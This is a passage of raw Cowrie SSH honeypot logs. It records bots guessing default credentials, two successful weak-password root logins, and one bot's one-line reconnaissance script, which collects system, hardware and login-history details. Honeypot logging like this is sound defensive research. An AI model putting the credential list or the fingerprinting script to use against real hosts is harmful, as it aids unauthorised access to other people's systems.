com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:08.160907Z","src_ip":"212.227.125.160","session":"5064d79596b1"}
{"eventid":"cowrie.login.failed","username":"arpwatch","password":"arpwatch","message":"login attempt [arpwatch/arpwatch] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:09.734521Z","src_ip":"212.227.125.160","session":"5064d79596b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54142,"dst_ip":"1.2.3.4","dst_port":22,"session":"763c0c1526c9","protocol":"ssh","message":"New connection: 212.227.125.160:54142 (1.2.3.4:22) [session: 763c0c1526c9]","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.142280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.228850Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.230240Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.703654Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:54:10.941213Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.941967Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.942780Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.944332Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.945818Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.946961Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.948127Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.949621Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.950504Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.951300Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.952133Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.952979Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:54:10.953753Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:54:11.007908Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:11.009063Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:11.010077Z","src_ip":"212.227.125.160","session":"763c0c1526c9"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:12.168614Z","src_ip":"212.227.125.160","session":"5064d79596b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49800,"dst_ip":"1.2.3.4","dst_port":22,"session":"274a872e8cb3","protocol":"ssh","message":"New connection: 212.227.125.160:49800 (1.2.3.4:22) [session: 274a872e8cb3]","sensor":"my-vps","timestamp":"2025-08-26T11:54:13.883305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:14.106349Z","src_ip":"212.227.125.160","session":"274a872e8cb3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:14.107193Z","src_ip":"212.227.125.160","session":"274a872e8cb3"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41126,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1f49a2a46cd","protocol":"ssh","message":"New connection: 83.168.105.65:41126 (1.2.3.4:22) [session: b1f49a2a46cd]","sensor":"my-vps","timestamp":"2025-08-26T11:54:14.693138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:14.696690Z","src_ip":"83.168.105.65","session":"b1f49a2a46cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:14.730834Z","src_ip":"83.168.105.65","session":"b1f49a2a46cd"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:54:14.877589Z","src_ip":"83.168.105.65","session":"b1f49a2a46cd"}
{"eventid":"cowrie.login.failed","username":"aporaudio","password":"aporaudio","message":"login attempt [aporaudio/aporaudio] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:14.895287Z","src_ip":"212.227.125.160","session":"274a872e8cb3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:54:15.046309Z","src_ip":"83.168.105.65","session":"b1f49a2a46cd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:54:15.047022Z","src_ip":"83.168.105.65","session":"b1f49a2a46cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:15.085147Z","src_ip":"83.168.105.65","session":"b1f49a2a46cd"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:15.086160Z","src_ip":"83.168.105.65","session":"b1f49a2a46cd"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:15.952057Z","src_ip":"212.227.125.160","session":"274a872e8cb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50568,"dst_ip":"1.2.3.4","dst_port":22,"session":"f408e69a3668","protocol":"ssh","message":"New connection: 212.227.125.160:50568 (1.2.3.4:22) [session: f408e69a3668]","sensor":"my-vps","timestamp":"2025-08-26T11:54:20.106237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:20.107072Z","src_ip":"212.227.125.160","session":"f408e69a3668"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:20.530641Z","src_ip":"212.227.125.160","session":"f408e69a3668"}
{"eventid":"cowrie.login.failed","username":"paas","password":"paas","message":"login attempt [paas/paas] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:21.367099Z","src_ip":"212.227.125.160","session":"f408e69a3668"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:22.420308Z","src_ip":"212.227.125.160","session":"f408e69a3668"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51340,"dst_ip":"1.2.3.4","dst_port":22,"session":"646248a40ebc","protocol":"ssh","message":"New connection: 212.227.125.160:51340 (1.2.3.4:22) [session: 646248a40ebc]","sensor":"my-vps","timestamp":"2025-08-26T11:54:25.415309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:25.416275Z","src_ip":"212.227.125.160","session":"646248a40ebc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:25.478224Z","src_ip":"212.227.125.160","session":"646248a40ebc"}
{"eventid":"cowrie.login.failed","username":"palworld","password":"palworld","message":"login attempt [palworld/palworld] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:25.934855Z","src_ip":"212.227.125.160","session":"646248a40ebc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:27.034380Z","src_ip":"212.227.125.160","session":"646248a40ebc"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53688,"dst_ip":"1.2.3.4","dst_port":22,"session":"f916864f47cf","protocol":"ssh","message":"New connection: 83.168.105.65:53688 (1.2.3.4:22) [session: f916864f47cf]","sensor":"my-vps","timestamp":"2025-08-26T11:54:30.116209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:30.117162Z","src_ip":"83.168.105.65","session":"f916864f47cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:30.154051Z","src_ip":"83.168.105.65","session":"f916864f47cf"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:30.266126Z","src_ip":"83.168.105.65","session":"f916864f47cf"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:31.305857Z","src_ip":"83.168.105.65","session":"f916864f47cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52106,"dst_ip":"1.2.3.4","dst_port":22,"session":"f439251da646","protocol":"ssh","message":"New connection: 212.227.125.160:52106 (1.2.3.4:22) [session: f439251da646]","sensor":"my-vps","timestamp":"2025-08-26T11:54:31.410448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:31.411127Z","src_ip":"212.227.125.160","session":"f439251da646"}
